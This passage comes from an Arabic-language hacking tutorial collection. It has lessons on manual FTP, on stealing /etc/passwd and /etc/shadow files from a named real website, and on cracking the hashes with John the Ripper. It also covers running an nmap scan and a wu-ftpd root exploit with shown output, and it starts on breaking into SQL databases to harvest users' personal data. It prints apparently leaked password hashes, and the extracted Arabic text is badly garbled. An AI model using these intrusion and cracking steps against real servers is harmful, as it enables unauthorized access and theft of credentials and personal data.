بعدأنتمت عملیهالولوجللنظام یجبإنشاء وصله لإرسال واستقبالالبیانا ت)قائمهبالملفاتالموجودةأو 

الملفات ذاتها)‏ ‏..إذن ماالذيكنا نفعله منذقلیل ؟!!‏ ماقد فعلناه منذقلیل هوإنشاء وصله لإرسال الأوامر 

للنظام واستقبالاستجابة النظام علىالأوامر . 

ولكي ننشئتلكالوصلة ‏،هناك طریقتین 

الأولي ‏:تنشئ هذه الطریقةالوصلةبان یرسلالزبون ‏(أن ت)‏ رقم IP الخا صبه و المنفذالمفتوح الذي 

یستطیع الخادماستخدامهفيإرسالالبیانات 

ولكنتلكالطریقة تتطلب منك فتحأحدالمنافذ على جهازك و هذا سیتطلببرنامج خا صلفتح هذاالمنفذ 

نستخدمتلك الطریقة 

الثانیة ‏:تنشئ هذه الطریقة الوصلةبان یرسلالزبونالأمر PASV 

.. ولذلكلن 


PASV 

و سیردالخادمبرقم IP الخا صبه والمنفذالمفتوح 

الاتصال علیه 

.. 

مثال 


227 Entering Passive Mode (207,189,69,61,12,41) 

.. 

‏(علىالخادمبالطبع)الذي یستطیع ال زبون ‏(أن ت)‏ 

و الرقم الطویلالموجودبین الأقواستفسیرهكالتالي 

أولأربع مجموعات ‏(منالیسار)هوال IP الخا صبالخادم وفي هذهالحالة یكون .. ٢٠٧،١٨٩،٦٩،٦١ 

أما الرقمانالتالیانفیمثلان رقم المنفذ ویتم حسابهكالتالي 

12 × 256 + 41 = 3113 

ولذلكفالخطوةالتالیةالتي یجب علىالزبون اتباعها هي فتح وصله جدیده معالخادم علىالمنفذ ٣١١٣ 

‏..ولكيتقومبمثل هذاالأمریتوجب علیك فتح نافذة Telnet جدیده وتشبك على ftp.zdnet.com 

بالمنفذ .. ٣١١٣ 

إذن عندماتریدأنترسلأحد الأوامر سترسله من النافذةالأولى و النافذةالثانیة ستظهربهاالبیانات 

مثال 

عندماترسل الأمر(‏ LISTیستخدم لعر ض محتویاتالدلیل)فيالنافذةالأولى 


.. 

١٤٧




LIST 

سیستجیبالخادمبالتاليفيالنافذةالأولىأیضا 


125 Data connection already open; Transfer starting. 

و ستظهر محتویاتالدلیلفيالنافذةالثانیةثم 

محتویاتالدلیل 

سیتم غلقالاتصالفي النافذةالثانیةبمجردإتمام عر ض 

. 

و هكذاكلماأرد تأنترسلأمر عر ض محتویات دلیل ماأواستقبالأوإرسال مل ف ما ، یجبأنتبدأ بأمر 

.. PASVثمتنشئ اتصالا جدیدا بعد حساب رقم المنفذباتبا عالخطوات السابقة . 

إلى هنا وأظنأننيقدتمادیت .. ولكننيلماستطعأنامنع نفسي 

من مشاركتكمبهذاالموضو عالممتع 

‏(ممتعبالنسبةإلي)‏ . 

ملاحظات هامة 

‏-لربما تتساءلالآن ‏..ألاأستطیعبدلا منكل هذا الهراءأناستخدمبرنامج جاهز مثل CuteFTP؟!!‏ 

بالطبعتستطیع ولكنلن یضركأنتعلم شیئا عنالبروتوكول الذيتستخدمه و ربما بعدتعلمالبروتوكول 

تستطیعأنتصنعبرنامجك الخا ص 

‏-اقرأالدرس مره و مرتین حتىتستوعبا لفكرةتماماثماسألفیما شئ ت 

- لتعلماكثر عن هذاالموضو عقم بزیارة المواقعالتالیة 

http://www.vbip.com/winsock/winsock_ftp_01.asp 

‏(ینصحبهبشده)‏ 

‏(ینصحبهبشده)‏ 

لمناراد التعمقفي 

البروتوكول)....‏ 

http://www.vbip.com/winsock/winsock_ftp_ref_01.htm 

) http://www.cis.ohio-state.edu/htbin/rfc/rfc0959.html 

١٤٨




" 

$$$$$$$$$$ 

الكاتب:الكندور 

$$$$$$$$$$ 

- 

اختراق المواقع 

..... 

‏(الجزء الثاني)‏ " 

ا لإختراق:‏ 

~~~~~~~~~ 

‏-المقدمة . 

‏-كی فأجمعمعلومات حول الموقع ؟ 

‏-كی فیتمكش ف نقاط الضع ف ؟ 

‏-كیف یمكن إ ستغلال نقاط الضع فالمكتشفه ؟ 

‏-ماهو مل فكلمة المرور password؟ file 

بماذا یفیدني هذاالمل ف ؟ 

‏-كیف یمكنمعرفةكلمة السر من خلال مل ف الباسورد password؟ file 

‏-ماالفر قبینإ ذاكان المل ف ‏(مشفر encryption) وإ ذاكان ‏(مضلل ‏(‏shadowed؟ 

‏-وماذالوكان مل فكلمة المرور مشفر ‏،كی فیتمكسره ؟ 

‏-ولوكان مل فكلمة المرور مضلل ، ماذا عليانأعمل ؟ 

 

كیفیة جمعالمعلوماتقدتقدم الكلام عنها 

~~~~~~~~~~~~~~~~~~~~~~~~~~~ 

- 

كی فیتمكش ف نقاطالضع ف ؟ 

~~~~~~~~~~~~~~~~~~~~~~~~~~ 

لاتستخدمبرامج مثل voidأو eye ShadowSecurityScaner هذهللمغفلینفقط!!‏ ‏،المحترفین 

واللي یبغا یكون محتر ف لایستخدمبرامجفي عملیات ا لإختراق ، ولا یخترقلمجردأنه یبغا یخترق ، 

عملیه إختراق سیرفرتمتازبالدقهالمتناهیه ، والتخطی طالمحكم ، وكل عملیات السطوالمحكمه هي التي 

یصعب إكتشا ف مرتكبیها ‏،لكن وااللهلوكنت مناللي یشغلبرنامج ومایدرياالله وین حاطهفصدقنيإنك 

ماراحتفلح طول عمرك ، هذالوقدرتتخترق شئ ‏،فلو حد ثوتما لإختراقبواحد من هذهالبرامجفسو ف 

تصطادبسنارهتماماكالسمكه 

الآن سو فأضع النقاطالأساسیهلكش ف نقاطضع ف على موقع ما 

- : 

..... 

-٢ 

‎١‎‏-التعر ف علىكافه الخدماتالموجوده علىالسیرفر.‏ 

معرفه نظامالتشغیل وإ صدارته وكذلك ملقم الویب وأيبرمجیاتأخر ى مثل مفسر نصو صبیرلإ ذا 

كان ذلك ممكن ‏،أوبرنامجللبیع والشراء الخ.‏ 

٣- عمل جلسه لإلتقاطكل السكربتات ) Cgi ( Perl - الموجودهفي الموقع ، هذاإ ذا وجد شئ منها 

- ٤ ولاتنسىتح ط البورتاتمعها ‏،لأنهأحیانا یكونفيالبورت نقطهضع ف ‏،لیس هذا ص حیحا 

نقطهالضع فلیستفيالبورت بعینه ‏،فيالبرنامج اللي مصلحإنصا تللبورت ‏(هذا أقربتعبیرلها)‏ 

‎٥‎‏-أخیرا یمكنك ا لإ ستفاده م نالمعلوماتالتي حصلت علیهافيالب حث عن نقاط ضع ف ‏(یوجدفي آخر هذا 

المستند مواقع من ظمنها مواقعتحتوي علىأرشیفاتقدتفیدكفي ال حصول على الثغرات ( 

%١٠٠ 

١٤٩




‏-كیف یمكن إ ستغلال نقاط الضع فالمكتشفه ؟ 

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 

أبس طالثغرات والتي یستطیعأي مبتديأن یستخدمهاهيتلكالتيتنفذ من خلال المتصفح ، 

نوع آخر ، یكون ا لإ ستثمار ‏(منالآن سو ف نطلقإسم إ ستثمار على الطریقه التيتستغلبها الثغره)‏ یكون 

ا لإ ستثمار على شكل شفره(كود)‏ مكتوب ببرنامج shفيلیونكس ، وهو ما یسمىبالعربيبرنامجالغلا ف 

وبالإنجلیزي shell وتكون هذهالشفرهتحت مل فبا لإمتداد *.sh وتعملتح تبیئهلیونكس ، وهذاالنو ع 

من ا لإ ستثمارات هو المفضل وی حسس المخترقبالقوه ونظرا لتعدد الأداوتفيلیونكسفإنلغه shell 

اصبحتقویهفهيتقابل كتابه مل ف دفعاتيفي ویندوز (bat) 

ویوجد نو ع منا لإ ستثماراتثاني وهو شفره ‏(كود)‏ مكتوببلغه C المشهوره ، وهذاالنو ع غالبا ماتحد ث 

فیهأخطأ أثناء عملیه الترجمه ‏،قدتواجهكثیر من المتاعبلذلك یجبأنتكونلدیك خلفیهفيلغه سي ، 

ولترجمه هذاالنو ع علیكبالذهاب الىلیونكسوترجمته بإ ستخدام المترجم gccبهذهالصیغة 

.. 

gcc Exploit.c -o Exploit 

ملاحظه مهمه ‏(یجبأن یكون ا لإمتدادللمل ف c.* ولیس ، C‏.*لوكان حر ف cكبتلفسوفیترجم 

ا لإ ستثمار وكأنه كتبفي سي ++ ، الشئ الثانيتأكد منتوفرالمكتبات (h.*) التيیتطلبها ا لإ ستثمارقبل 

تشغیله)‏ و علیك زیاره موقعيفهناك مستنداتفيالبرمجهقدتنفعك . 

یوجد نوع ظهر مؤخرا من ا لإ ستثمارات وبداء ینتشر وهوأیضا شفره ولكن مكتوبهبلغه Perl ومن 

الممكنأنیتمتشغیل هذا النو ع من موجه الدوسفي ویندوز ‏(یجبأنتملكبرنامج یفسر شفرات البیرل 

مثلأكتی فبیرل ( 

‏-ماهو مل فكلمة المرور password؟ file 

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 

مل فكلمة المرورمعرو ف منإسمه ‏،هوالذيفي داخلهتوجد حسابات الأشخا ص المرخ صلهمبالدخول 

الىالسیرفر ، مثل هذا 

------------------------------------------------------------------------------------------------ 

root:x:0:1:Super-User:/:/sbin/sh daemon:x:1:1::/: bin:x:2:2::/usr/bin: 

sys:x:3:3::/: adm:x:4:4:Admin:/var/adm: lp:x:71:8:Line Printer 

Admin:/usr/spool/lp: smtp:x:0:0:Mail Daemon User:/: uucp:x:5:5:uucp 

Admin:/usr/lib/uucp: nuucp:x:9:9:uucp 

Admin:/var/spool/uucppublic:/usr/lib/uucp/uucico listen:x:37:4:Network 

Admin:/usr/net/nls: nobody:x:60001:60001:Nobody:/: 

noaccess:x:60002:60002:No Access User:/: 

nobody4:x:65534:65534:SunOS 4.x Nobody:/: 

www:x:102:1001::/web:/bin/csh 

mirrors:x:102:1001::/web/mirrors:/web/mirrors/menu 

sid:x:103:10::/export/home/sid:/bin/ksh 

mirror:x:104:1::/home/mirror:/bin/sh 

admin:x:105:1::/home/admin:/bin/sh 

jerome:x:106:1::/home/jerome:/bin/sh erl:x:102:1::/home/erl:/bin/sh 

landmark:x:1000:1000::/web/landmark:/bin/ksh 

١٥٠




------------------------------------------------------------------------------------------------ 

وقدتكونأكثر بكثیر ، حیثأن هذاالمل فالموضحبالأعلىأختصربشكلكبیر،‏ فعندسحبهكان یحتوي 

على آلالا ف السطور ‏،لیسكل ملفا تكلماتالمروربهذا ال حجمفیوجد منها من لایتجاوز ‎١٠‎أسطر وهي 

الموجوده بكثره ، علىالعمومأنت ال حین علیكتعر ف بأن مل فكلمة المرور هو الذيفي داخلهتوجد 

حساباتالأشخا صالمرخ صلهمبالدخول الى السیرفر ...... 

‏-بماذا یفیدني هذا الملف ؟ 

~~~~~~~~~~~~~~~~~~~~~~~~~~ 

یفیدك یاالحبیبفيمعرفهكلماتالسروإسماءالمستخدمینلكيتقوم بإختراق الموقع ، ولكنلاتفرح 

كلمة المرورتكون مشفره ، لا هذالیس ص حیحاتماما ‏،كانت مشفره زمان ولكنفي الوقت الحالي هي 

مضلله 

وا*‏ = xكلمة سر مضلله Shadowed 

= EpGw4GekZ1B9Uكلمة سر مشفره على مقیاس ، DES هذا النو ع منالتشفیرالمستخدمفي 

لیونكس و FreeBSD وعدد منالأنظمه الأخر ىضعی ف ، وهو دائما مكون من ١٣ حر ف ورقمكبتل 

وسمول ولا یحتوي منبینها على رمزابداً،‏ بإ ستثناء ویندوزفهو یستخدم نوع آخر منالتشفیر وهو نوع 

ضعی فأیضا.‏ 

!... 

‏-كیف یمكنمعرفةكلمة السر من خلال مل ف الباسورد password؟ file 

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 

إ ضغط Ctrlفي + Shift القسمالأیمن منلوحهالمفاتیح لتقراء منالیسارالى الیمین ‏،ثمإ ذهب الى 

الاعلى حیث وضعت مثاللمل فكلمة مرورتم سحبه منالموقع ... hwwilson.com 

تفسیر هذاالسطر 

- : 

root:x:0:1:Super-User:/:/sbin/sh 

root 

x 

هذا السطر یوضخالمستخدم واللي هوالجذرroot 

هيكلمةالمرور ، ویتضحانها مضلله،‏ یعني مكانها العلامة ، x لاتفكرفيكسرهافهذا مست حیل ، 

لكن علیك الب حث عن مل فثانيتمتخزینفیهكلمةالمرور،‏ ستعر ف بعدقلیلكی فتفعل هذا..‏ 

0 

هذا هو رقم المستخدم 

1 

رقمالمجموعه 

Super-User:/:/sbin/sh و هذا م ش مهم 

++++++++++++++++++++++++++++ 

الجزء الثالث 

‏-ماالفر قبینإ ذاكان المل ف ‏(مشفر encryption) وإ ذاكان ‏(مضلل ‏(‏shadowed؟ 

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 

المل ف المضلل shadow file یكون مكانكلمةالمرور رمز مثل ‏*أو xأو ‏#أو مثاللها ! وهذا 

root:x:0:1:Super-User:/:/sbin/sh لكنالمل فالمشفرتكونكلمة المرور مكتوبه ولكن 

مشفره مثل هذه root:Q71KBZlvYSnVw:0:1:Super-User:/:/sbin/sh 

١٥١




هناتكونكلمةالمرور المشفره هي Q71KBZlvYSnVw 

الآن طلعتالصوره صافیه .... 

‏-وماذالوكان مل فكلمة المرور مشفر ‏،كی فیتمكسره ؟ 

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 

البرامجكثیره وأشهرها هو Crack 5.0a و john the ripper ویوجد آخربإسم jack the 

ripper ، 

the ripper 

..... 

-: 

. 

--------------------------------------------------- \ Q2wrtUo9LPq2R البدایه ‏(كلمةالمرورالمشفره)‏ معأخذكلمة منال wordlist الكلمات المختاره حتى یتم 

word list التطاب ق->‏ Q6LiJ6ct1oUBzكلمة مرور مشفره مع الكلمة المختاره من القائمة 

ولنفر ض مثلا song فاذا حد ثتطابقفهذا یعنيأنكلمةالمرورالتيكانت مشفرهقدكسرت 

.. 

| ------------------------------------------------------------------------------- ‏|ملاحظه مهمه -: 

یتم عمل دوره مثل الموضحهفيالأعلىلكسركلمات المرورالمشفرهبسرعه 

‎٥٠٠٠‎تجربهفيالثانیه إختبرناripper johnعلىمعالجبسرعه the 

(٧٠٠ 

) 

‏}النهایه}‏ | 

| ------------------------------------------------------------------------------- 

لتشغیل john the ripper 

من واجه دوس نكتبالأمرالتالي 

john -w:wordlist passwd 

حیث wordlistهو مل فالقاموس الذي یحتوي على عددكبیر منالكلمات 

و passwdهوالمل فالذيیحتوي علىكلماتالمرور المشفره والتي نودمعرفتها 

------------------------------------------------------------------------------- 

Microsoft(R) Windows 98 

C)Copyright Microsoft Corp 1981-1998.( 

E:\Desktop\junk\john the ripper>john -w asswd passwd.txt 

by Sola 97,John the Ripper Version 1.3 Copyright (c) 1996 

Loaded 1 password 

**v: 0 c: 6401 t: 0:00:00:01 99% c/s: 6401 w: *****DONE 

>E:\Desktop\junk\john the ripper 

------------------------------------------------------------------------------------------------ 

... 

وسو فتحفظالنتیجهفي المل ف john.pot الموجودفي نفس الدایروكتري ، وعلیك حذ ف هذا المل فإ ذا 

أردتالبدءفي عملیهكسر جدیده ویمكنكتغییرإسمهأو نقلهفي مكان آخربدل من حذفهإ ذاكنتتر ى ذلك 

هناك طریقهاخرىللكسر وهيتسمىب bruteأوبالعربيالقوهالعنیفه force ، وهي لاتحتاجلمل ف 

١٥٢



... 


.. 

، wordlistهيتقوم بتجربهكلالحرو ف والأرقام والرموز مع بع ضفي خانتان و ٣ خانات واربع 

وخمس الخ حتىتصیبكلمةالمرورالص حیحه ، وأناافضلانتستخدم ملفات wordlistفذلكلن یأخذ 

معكفيالاثوانيفقطلأن عملیهالتجربه الموضحهفيالرسمبالأعلى ذكرت بأنه سرعةتجربه الكلمات 

یتجاوز ‎٥٠٠٠‎كلمةفيالثانیه ‏،إ ذالمتفلح ملفات wordlist حینهاإ ذهب الى القوهالعنیفه brute 

.... force الأمرالتالي یجعل johnیستخدم the ripper طریقه brute force السابق ذكرها 

john -i passwd 

حیث passwdهو مل فكل مةالمرورالمرادكسره ‏،إ ذاقمت بتجربه هذه الطریقهإ ضغ ط إنتر أثناء عمل 

البرنامج لتر ىالىأینتوصل 

‏-ولوكان مل فكلمةالمرور مضلل ، ماذا عليانأعمل ؟ 

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 

دائما سو فتواجهكلمة مرور مضلله ‏،لكنهناك طریقهتسمى Unshadowلحل هذهالمشكله 

إ ذا واجهت ملف مضلل علیك الب حث عن مل فثاني یسمى مل ف الشادو ‏(مل ف الظل)‏ shadow file 

وهذاالمل ف یوجدفيامكنهمعینه وكل نظامتشغیلله مكان یوضعبه هذا المل ف ، الیكالجدول التالي 

: 

!! 

Linux : /etc/shadow token = * 

= token SunOSیأخذأشكال : /etc/shadow متعددهاشهرها هو * 

x هو FreeBSDوالجدید : /etc/master.passwd or /etc/shadow token = * 

IRIX : /etc/shadow token = x 

AIX : /etc/security/passwd token = ! 

ConvexOS : /etc/shadow or /etc/shadpw token = * 

token 

تعني الرمز الذي یوجدفيالمل ف ، passwd وهذا یفیدفيتسهیلالمهمه،‏ یعنيلو مثلالقیت 

علامه ‏!بدلكلمه المرورفهذایعنيانكلمة المرور مسجلهفي ، etc/security/passwd‏/لقد 

إ ستعنتبالجدولالسابق ذكره ، مثال على مل ف شادو أكرر مل ف شادوهو المل فالذيتخزنفیهكلمة 

) 

المرورالص حیحه ( 

هذا مل ف shadow 

------------------------------------------------------------------------------------------------ 

root:EpGw4GekZ1B9U:11390:::::: bin:NP:6445:::::: sys:NP:6445:::::: 

adm:IyEDQ6VoRlLHM:10935:::::: #admin:9z8VMm6Ovcvsc:10935:::::: 

lp:NP:6445:::::: 

------------------------------------------------------------------------------------------------ 

نلاحظانكلمات السر موجوده 

الخطوه الأ خیره وهي دمج مل فالباسورد passwd file مع shadowلن passwd حصل على مل ف 

متكامل ونقدمهالىبرامج الكسرالسابق ذكرها...‏ 

هذا مل فباسورد حصلنا علیه من http://wilsonweb2.hwwilson.com/etc/passwd 

------------------------------------------------------------------------------------------------ 

root:x:0:1:Super-User:/:/sbin/sh daemon:x:1:1::/: bin:x:2:2::/usr/bin: 

sys:x:3:3::/: adm:x:4:4:Admin:/var/adm: lp:x:71:8:Line Printer 

Admin:/usr/spool/lp: smtp:x:0:0:Mail Daemon User:/: uucp:x:5:5:uucp 

Admin:/usr/lib/uucp: nuucp:x:9:9:uucp 

Admin:/var/spool/uucppublic:/usr/lib/uucp/uucico listen:x:37:4:Network 

Admin:/usr/net/nls: nobody:x:60001:60001:Nobody:/: 

١٥٣




noaccess:x:60002:60002:No Access User:/: 

nobody4:x:65534:65534:SunOS 4.x Nobody:/: 

www:x:102:1001::/web:/bin/csh 

mirrors:x:102:1001::/web/mirrors:/web/mirrors/menu 

sid:x:103:10::/export/home/sid:/bin/ksh 

mirror:x:104:1::/home/mirror:/bin/sh 

admin:x:105:1::/home/admin:/bin/sh 

jerome:x:106:1::/home/jerome:/bin/sh erl:x:102:1::/home/erl:/bin/sh 

landmark:x:1000:1000::/web/landmark:/bin/ksh 

------------------------------------------------------------------------------------------------ 

ومنال token الموضح واللي هو x نعر ف من خلالالجدولالسابق ذكره بأنكلمة المرورالص حیحهفي 

الدلیل /etc/shadow 

إذننتوجهبالمتصفح الى 

http://wilsonweb2.hwwilson.com/etc/shadow 

لن حصل على المل ف 

------------------------------------------------------------------------------------------------ 

root:XOT4AiUKMRcKQ:10643:::::: daemon:NP:6445:::::: 

bin:NP:6445:::::: sys:NP:6445:::::: adm:NP:6445:::::: lp:NP:6445:::::: 

smtp:NP:6445:::::: uucp:NP:6445:::::: nuucp:NP:6445:::::: 

listen:*LK*::::::: nobody:NP:6445:::::: noaccess:NP:6445:::::: 

nobody4:NP:6445:::::: www:WJctaI.8rcSe2:10507:::::: 

mirrors:gg9p.5kwGw1MY:10911:::::: sid:stXldZKnujFYo:10515:::::: 

mirror:iMPWwbrU.gB4k:10601:::::: admin:hDhB5YYKyWgQw:10976:::::: 

jerome:XDqnOl32tPoGo:10976:::::: erl:0jE9Xem4aJYeI:10982:::::: 

landmark:0jCgWu6vl8g0s:11185:::::: 

------------------------------------------------------------------------------------------------ 

نقومبنسخكلمات السرالموجودهفیه ولصقها مكان علامه xفي مل فالباسورد ، وهكذا مع جمیع 

ال حسابا تلن حصل على مل فكلمة مروركامل ومتكامل ونقدمهالىبرامج الكسر 

ملاحظه مهمه 

علیكجعلكل حسابفي سطر،‏ یعنيتربتها لتعر ف علیهابرامج الكسر 

-: 

... 

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ 

مواقعتستحق الزیاره :- 

أرشی فلثغرات 

www.securiteam.com/exploits/archive.html 

أرشی فلثغرات 

http://www.ussrback.com/ 

أرشی فثغرات ‏+الكثیر 

http://www.secureroot.com/ 

أرشی فثغرات 

http://rootshell.redi.tk/ 

أرشی فثغرات 

١٥٤




http://www.ussrback.com/ 

مواقعلثغرات 

www.secureroot.com/category/exploits 

دلیللمواقعالهاكینق 

www.hitboss.com/Hacking 

محركبحث لا غني عنه 

www.undergroundnews.com/resources/s...ound/search.asp 

Warez.com-Underground 

http://www.warez.com/ 

Hacking 

‏(ممتازلمن یریدالبدایه)‏ 

http://www.neworder.box.sk/ 

Security Search Engine 

http://www.bugs2k.com/ 

insecure 

http://www.insecure.org/ 

 

http://public.www.easynet.co.uk/cgi...ail/formmail.pl 

... 

١٥٥




" 

درس في اختراق المواقع 

‏(متوسط)‏ " 

... 

$$$$$$$$$$ 

الكاتب:‏ ICER 

$$$$$$$$$$ 

) 

الادواتالمطلوبه ‏:شیلاكاونت اذابحثتفي جوجل سو فتجدالكثیر منالشیلز و طبعاالناسالمحترمه 

احمممم)‏ بتركبلینكساو یونیكسوتعی ش حیاتها وتریح نفسها...في ناستانیه ماتحب شاللینكس 

الشیلاكاونتكویسلها و ممكن یمشي وانا عن نفسي م ش حاستعملالاتنین 

بسبالنسبهللي حیستعملوالشیل لازمیتاكدوانهبیسمحبالبرامجالاساسیه زي 

(: 

nslookup, host, dig, ping, traceroute,telnet, ssh, ftp 

واساسي لازمال gcc عشانتعر فتعملكومبایل...(یا عم ركبلینكس و ریح نفسك ( و طبعاالادوات 

واخر حاجه هيالاكسبلویت 

دي 

بع ضالملحوظات الهامه : 

الشیلاكاونت شبیه جدابالدوس معاختلا ففيالاوامر والوظائ ف ‏..م ش حناق شكیفیهال حصول على 

واحد لانفیه مواضیعكثیره اتكلمت علیه.‏ 

‎٢‎‏-اداهال nmap هي عباره عنبورت سكانر متقدم . 

‎٣‎‏-ال NetCat هياداه شبیهبالتلنت وتقومبرفعبیانا تلسیرفیرمعین . 

‎٤‎‏-الاكسبلویتاتهي عباره عنبرامج غالباتكون مكتوبهبلغهالسي و هيتقومباعطائككافهالصلاحیات 

فهيتخترق جهازمعین وتقوم بعملكل شيءانتتریده ممكنتلاقیهافین؟؟؟ 

مواقعالسیكیوریتي علىافه من یشیل...دور ولو مالقیت شقولي واناادیلككام موقعتجیب منهالحاجات 

دي....‏ 

المواقع المرتبطهبالموضو ع 

. 

nmap and netcat 

* 


: 

* 

(a) Linux (http://www.slackware.com 

(b) Nmap (http://www.insecure.org 

(/c) NetCat (http://www.l0pht.com/~weld/netcat 

الخطوات :- 

١- ركبالینكس و خ ش عالنت ‏(م شقلتلك مفیشاحسن مناللینكس 

٢- ركبالاداه nmap متبعا التالي 

( P: 

: 

tar zxvf nmap.tar.gz (١* 

cd nmap (٢ 

configure && make && make install/. (٣ 

‎٣‎‏-شو ف الموقعالمستهد ف ولیكن 

nslookup www.target.com 

.. 

www.target.com 

٤- شو فالايبيتبعالموقعباستخدام 

هذا سو فیعر ضلكالايبيللموقع ولیكن ١٩٦٫١٫٢٫٣ 

٥- شو ف الخدماتالليبیقدمهاالموقع وكمان شو ف نظامالتشغیل متبعا التالي :- 

"nmap -sS -O 196.1.2.3" 

١٥٦




- : 

root@IcEr:~# nmap -sS -O 196.1.2.3 

( /Starting nmap V. 2.54BETA22 ( www.insecure.org/nmap 

:(Interesting ports on www.target.com (196.1.2.3 

(The 1531 ports scanned but not shown below are in state: closed) 

Port State Service 

tcp open ftp/٢١ 

tcp open smtp/٢٥ 

tcp open http/٨٠ 

tcp open sunrpc/١١١ 

tcp open auth/١١٣ 

tcp open printer/٥١٥ 

tcp open unknown/٩٦٣ 

tcp open kdm/١٠٢٤ 

tcp filtered krb524/٤٤٤٤ 

tcp open X11/٦٠٠٠ 

tcp filtered napster/٦٦٩٩ 

OS guess for host: Linux 2.2.14-2.2.16 

(Uptime 0.160 days (since Mon Apr 30 14:51:06 2001 

Nmap run completed -- 1 IP address (1 host up) scanned in 67 seconds 

#~:root@IcEr 

المفرو ضانه یدیك مخرجات شبه الكلام ده 

تمامكده یا شباب نكمل...‏ 

الكلام دهكله عباره عناستكشا فللموقع یوریك البورتاتالمفتوحه..ممكنتشو فلوكانفیه 

daemon شغال علىالموقع و لا في المثال الليفوق حنلاقیه موجود و دهكویس 

شو فايفیرجین من FTP daemon موجوده متبعاالتالي 

"telnet 196.1.2.3 21" 

او 

"ftp 196.1.2.3" 

اي منهم حیدیكبانرفیهالفیرجین بتاعهالا فتيبي دیموناللي شغاله علىالسیرفیر ممكن یكون زيكده 

FTP 

-: 

root@IcEr:~# ftp 196.1.2.3 

.Connected to 196.1.2.3 

www.target.com FTP server (Version wu-2.6.0(1) Mon Mar 6 ٢٢٠ 

(13:54:16 SAST 2000 

.ready 

Name (target:root): anonymous 

.Guest login ok, send your complete e-mail address as password ٣٣١ 

:Password 

Welcome, archive user! This is an experimental FTP server. If have -٢٣٠ 

any 

(: 

١٥٧




unusual problems, please report them via e-mail to -٢٣٠ 

root@IcEr.pandora.net 

If you do have problems, please try using a dash (-) as the first -٢٣٠ 

character 

of your password -- this will turn off the continuation messages -٢٣٠ 

that may 

.be confusing your ftp client-٢٣٠ 

-٢٣٠ 

.Guest login ok, access restrictions apply ٢٣٠ 

.Remote system type is UNIX 

.Using binary mode to transfer files 

ftp>by 

#~:root@IcEr 

منالكلام دهتقدرتعر فانالفیرجینالموجوده هي .wu-2.6.0 

وایضااحنا حاولنا نخشكمجهولین anonymous وكان تاعملیه ناجحه؛)‏ 

صلي علىالحبیب المختار ####### 

‎٧‎او ٨ م شفاكر المهمانهااهم خطوه 

احصل علىالاكسبلویت بتاعهالفیرجین دیه من .FTPd ) الليیعمل سیر ش میتوه ش ( 

و لتكن 

المهملو شفتالسورسكود بتاعها حتلاقيانها متكوده عشان نظامتشغیلمعین ولیكن 

و یا سلاملوكانالموقعالمستهد فبیعمل على نظامالتشغیل دهكده یبقىكلالليتعملهانكتعملكومبایل 

للثغره دي وبشغلها على سیرفرالموقع المستهد ف وكده حیدیك 

red hat 6.2 

-: 

wuftpd2600.c 

####### 

root access 

root@IcEr:~/# ./wuftpd2600 -t -s 0 196.1.2.3 

Target: 196.1.2.3 (ftp/): RedHat 6.2 (?) with wuftpd 2.6.0(1) 

from rpm 

Return Address: 0x08075844, AddrRetAddr: 0xbfffb028, Shellcode: 152 

..loggin into system 

USER ftp 

.Guest login ok, send your complete e-mail address as password ٣٣١ 


man gcc 

.. 

!Bang! You have root 

طبعاانا نسی تامر الكومبایل ‏..شو فالامر ده 

و هوه حیدیلكمعلوماتكامله عنامر الكومبایل بكلالخیارات الليمعاهكده یبقىاناكده عملت اللي 

علیه محد ش یسالنيباه بعدكده و یقولي یاواد یاایسراعملایه 

.. 

search..U will find what U wanna 

... 

بع ضالثغرات بتحتاجه..‏ 

اه نسی ت ‏..محد ش سالنياعملبالنتكات بعدكده طیب لو لاحظ تاننااستغلینا خاصیهال annonymous الموجوده ‏..لاكنلوكانتالخاصیهدي م ش 

موجوده ‏..یبقى م ش حنعر ف نكمل الكلام ده ..... عشانالاكسبلویت م شتشتغل في هذهالحاله 

الاكسبلویت مشتشتغلالالو معاناباسورد و یوزر نیم عشان نخ ش علىالا فتيبي بتا ع الموقع..‏ 

صبیها..بس 

خا عشانكده لازمتقراالسورس بتا عالاكسبلوی ت..وكل اكسبلویتلها ساینتكس و شغل المبادئالاساسیه واحده....‏ 

.. 

١٥٩



" اختراق الSQL " 


$$$$$$$$$$$$ 

الكاتب:‏ linuxray 

$$$$$$$$$$$$ 

س:فيالبدایة ماهيالاسكیوال 

) SQL ‏)؟؟ 

الاسكیوال هي عبارة عنقاعدبیاناتتحتوي على جداول واغلبالمواقعالتيتكون صفحاتها منتهیة ب 

ASP هي صفحا تتسحببیاناتها منقاعدة SQL وصفحات ASP ممكنانتكونكنز منالمعلومات 

لاختراققواعدبیاناتQLS وهذا ماسو فاشیرالیه لاحقا ، و SQL تتنصت علىالبورت ١٤٣٣ 

ایضا مااریداناخبركبهانال SQLقدتحتوي على اكثر منقاعدةبیانات وكلقاعدةبیاناتتحتوي 

على عدد منالجداول یمكن 

ان تتصوركبرقواعدبیانات SQL والعددالكبیر منالبیاناتالتىتحتویها . 

س:‏ مالذيیمكناناستفید منهاذااخترقتقاعدةبیانات SQL ؟ 

هذا على حسب نشاطالموقعاذاكان هذا الموقع منتد ى لااقصد منتدیات PHPبل منتدیات ASPفي 

الغالب سو فت حصل على جمیعاسماء 

المستخدمین وكلماتالسر وبامكانكتعدیل وحذ فاي موضوع وصلاحیاتلمتكنت حلمبها ‏،امااذاكا ن 

الموقع یحتوي على میزة 

قائمةالمراسلا تفسو فت حصل علىاعداد خیالیة منالایمیلات ، عندهاقمبانشاء شركةللدعایة والاعلان 

وسو فتصبحثریااذنلاتنسى LinuxRay_ 

توقعانتجداي شئ داخلقواعدبیاناتمعلوماتاشخا ص ‏-ارقام هوات ف 

ممكنانتصبح 

اعر فانهقداصابك المللالانلكناستعد نشاطك من جدیدفالطریق مازال طویلا 

- عناوین ‏-تورایخالمیلاد ، 

... 

. Administrator 

س:‏ مالذيتحتاجةللدخول علىقواعدبیانات SQL ؟ 

